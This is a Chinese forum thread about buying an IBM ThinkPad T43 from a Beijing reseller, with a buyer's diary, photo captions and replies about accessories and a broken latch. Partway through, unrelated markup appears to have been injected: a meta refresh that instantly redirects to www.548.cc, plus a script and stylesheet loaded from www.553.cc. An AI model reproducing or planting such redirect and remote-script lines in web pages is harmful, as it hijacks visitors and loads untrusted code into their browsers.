开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

购机日记已写 附图 欢迎大家拍砖 :)

发票已到

评分

EddieFan + 2

贵宾已加,港票地址到这里http://www.xynbnb.com/viewthread ... ;amp;extra=page%3D1
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

如何登录贵宾区?
您无权进行当前操作,这可能因以下原因之一造成:

本论坛只有特定用户组可以访问。
您已经登录,但您的帐号或其所在的用户组无权访问当前页面。
他忘了给你加了。。。。。我给你加
很早就想拥有一台IBM了,最早有这个想法可能是再刚用上公司的本本时,因为在公司给我配置本本时,当时给我配的时联想邵阳14寸的(具体忘了)用了2年多,前两天还从同事那里借来的这台老将牌了张照片,后来公司换了一台 还是联想,因为在公司给我配之前已经体验过同事IBM本本了,喜欢小黑。所以一直关注小黑的动态,但是苦于没有米啊 呵呵

这次下决心购买自己小黑的原因一个是因为T43型号已经快结束了,在部出手就没了,T60系列的造型自己又不喜欢(不想说IBM电脑部被联想收购)。于是决定出手  呵呵

最早的打算是叫朋友在香港的亲戚代的,但是因为代过来需要等他假期才行,等啊等啊 自己就没有耐心了,于是另想办法!于是想到邮购。偶然的机会看到了XY的论坛,于是注册、潜水。
其实在YX的论坛已经很久了,开始时没有注册,只是看帖子,专心潜水。后来耐不住寂寞(主要是看了,回帖积分可以优惠100,各位新人注意啊,要注意充分利用!!呵呵)出来灌水。其中还因为灌水在回一个帖子的时候被楼下拍砖,说我"灌水没有水平 被警告了还灌"(注:原话引用!如假包换!),其实说实话 灌水确实因为有优惠的缘故,当时被警告我确实不知道,因为我回帖啊什么的更以前没有区别啊,也没有收到斑竹的消息什么的,我当然不知道了,这个问题看来还是要早那个楼下兄弟好好给我解释一下,谢谢先了

潜水了很久也看了不少帖子,也回了不少,其实心里已经对XY已经有信任感了,只是早晚出手的事罢了,本打算4号去成都在出手的,但是后来想先在上海XY的人帮助验机什么的 于是就决定在上海买了再说:),于是在5月27日在网上联系YY给他要帐号,我没有打电话,因为我觉得没有必要。我要了交行&浦发的帐号,于是在第二天28日(周日)全款汇了过去,优惠了100。顺便说一下 我的机器到了后我发现BH2降了100 命苦啊 :(
说以下我的配置先:
IBM T43 BH2  (废话肯定是IBM么!):)
D套餐 A款双肩包
IBM原装内旦包  (很漂亮,也很实用,有条件的新人一定要买!)
3M擦布
三项国标电源线(建议买H货的朋友一定要买个,也可以在电脑市场上购买,废话不说等下看图吧:))

汇好款后然后短信通知YY,确定到款后,然后在网上,主要是QQ联系。确定装机、系统、分区的要求。还有货的要求。
然后就等啦 呵呵
因为自己事情比较多,到是没有特别忐忑不安,因为大家看看网上网友对XY的评价就明白了 :)

货是30号早上到的,大概是10点多吧,顺风的人说8:30就到了,只是办公楼的物业不叫人家上(BS一下!)说是上班高峰快递不能用 考!什么道理! 赶紧签收了包裹 呵呵 外观就不说啦 俺们要得是本质的东西 呵呵

本本没有当时打开 因为自己私人买的不想太招摇 呵呵 ,因为晚上喜欢的MM吃饭,所以见到本本的时间比较晚了
:)  
这里要说的还有个插曲,打开后看到一个断掉的本本卡扣(不知道这个官方叫什么,等下看图说话 呵呵),看到这个东东的第一反映就是看自己的本本有没有缺少,检查了自己本本屏幕上的卡扣,确定两个都在后就没有在意了,后来就是开机充电+欣赏,因为太晚了 就没有装软件什么的。主要是充电了。
后面几天就装软件什么了,后来在装软件的过程中发现 本本下方左右的卡扣样子不一样,马上就和YY也通了第一次电话,他说要看看照片,我拍了照片发过去, YY说要换整个键盘下方的整个外壳 ,需要400大元,因为第一不确定是不是这个下方的卡口断裂,还有XY说这个不可能是在运输途中出现的,所以更换的化只有花400大元:( ,最后还是决定不换 咳!最重要的是不影响使用,想想算了 。不说这个了!

。。。。。。。(此处省略N多装软件过程 :)) 装好后在周末又给本本贴了个液晶保护膜,宜丽客的89块 ;增加了一个钢威512M内存,叫老板送了一个SONY假货鼠标。咳没办法我的Razer烈火熔岩坏掉了 还没修好,我用本本都是用Razer,喜欢比较灵敏的鼠标。还买了一个二项转三项转换器。

以上就是我的购机经历,这个就是俺用小黑码出来的,大家将就着看吧 文笔不好见量哈 :)

下面给些图 手机π的质量不好 多多见量!

+30---EddieFan

评分

EddieFan + 30

对了 如何贴图?
把附件里传你要贴的图即可
最早用的公司配的BB,现在同事在用
公司现在用的BB,还是联想的 上面的别克标志是俺贴上去的 ,大家不要以为别克也造BB啊 呵呵

先发新本本断掉的卡扣(姑且允许俺这么叫)
新本本的图 以及IBM原装内旦
BH2原装电源,以及电源线(英国制式样)建议在买个国标三项电源线,因为这种插座国内比较少!强烈建议

XY购买的国标三项电源线  那个假SONY鼠标 想必大家都熟悉吧 :)
IBM行货(中国供货)的电源线,电源样子差不多 只是T43的比R40的小2个毫米(自己量的 )呵呵 无聊啊! 还有买的两项转三项转换器。
俺的CDMA手机 和IBM原装电源线(三项直插的)还有假sony鼠标.jpg
4口USB hub ,SD读卡器,还有2G SD卡,忘了说了 俺是左撇子 huhu
买的USB hub 还有读卡器 SD卡(2G的).jpg
好了 就这么多了 要睡觉了  斑竹不要忘了给加点猪肉啊  呵呵 最好多给点

希望以上的东东对新来购机的XDJM有帮助,有疑问可以问  :)

花400大元,怎么回事?
这个卡口好像是连在机器板上的,YY说要换的话只能全部换调,需要400大元 :(
问一下 我怎么在贵宾区域下载东东啊? FTP登陆不上!
LZ什么单位啊~怎么全是lenovo的BB~?
呵呵 公司配的 没法选  是作通信的
口水ing

坚持学习楼主,灌水!

不过想灌就灌,要灌得有水平!超级TP
原装插头里面还有保险丝 赞一个
那个扣子是干什么的?